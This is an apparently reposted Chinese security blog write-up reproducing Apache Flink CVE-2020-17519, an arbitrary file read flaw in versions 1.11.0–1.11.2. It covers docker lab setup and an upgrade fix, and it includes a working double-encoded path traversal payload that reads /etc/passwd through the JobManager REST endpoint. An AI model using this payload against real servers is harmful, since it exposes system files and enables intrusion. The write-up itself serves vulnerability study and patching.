看啥推荐读物
专栏名称: 渗透Xiao白帽
早起的鸟儿有虫吃!相互学习分享涨知识。会不定期分享一些网络安全相关内容.
今天看啥  ›  专栏  ›  渗透Xiao白帽

【漏洞复现】Apache Flink CVE-2020-17519

渗透Xiao白帽  · 公众号  ·  · 2021-01-06 13:15
0x01 漏洞简介Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。0x02 漏洞影响1.11.01.11.11.11.20x03 环境搭建这里直接在docker环境下复现,因为它搭建环境太香了!更新dockergit pull更新完成后启动docker编译环境docker-compose up -d访问http://1.1.1.1:8081 如下说明环境已经起来了0x04 漏洞复现poc/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd0x05 修复建议所有用户升级到Flink 1.11.3或1.12.0,下载链接为:https://flink.apache.org/downloads.htmlhttps://flink.apache.org/downloads.html0x06 参考文章don9sechttps://mp.weixin.qq.com/s/W ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照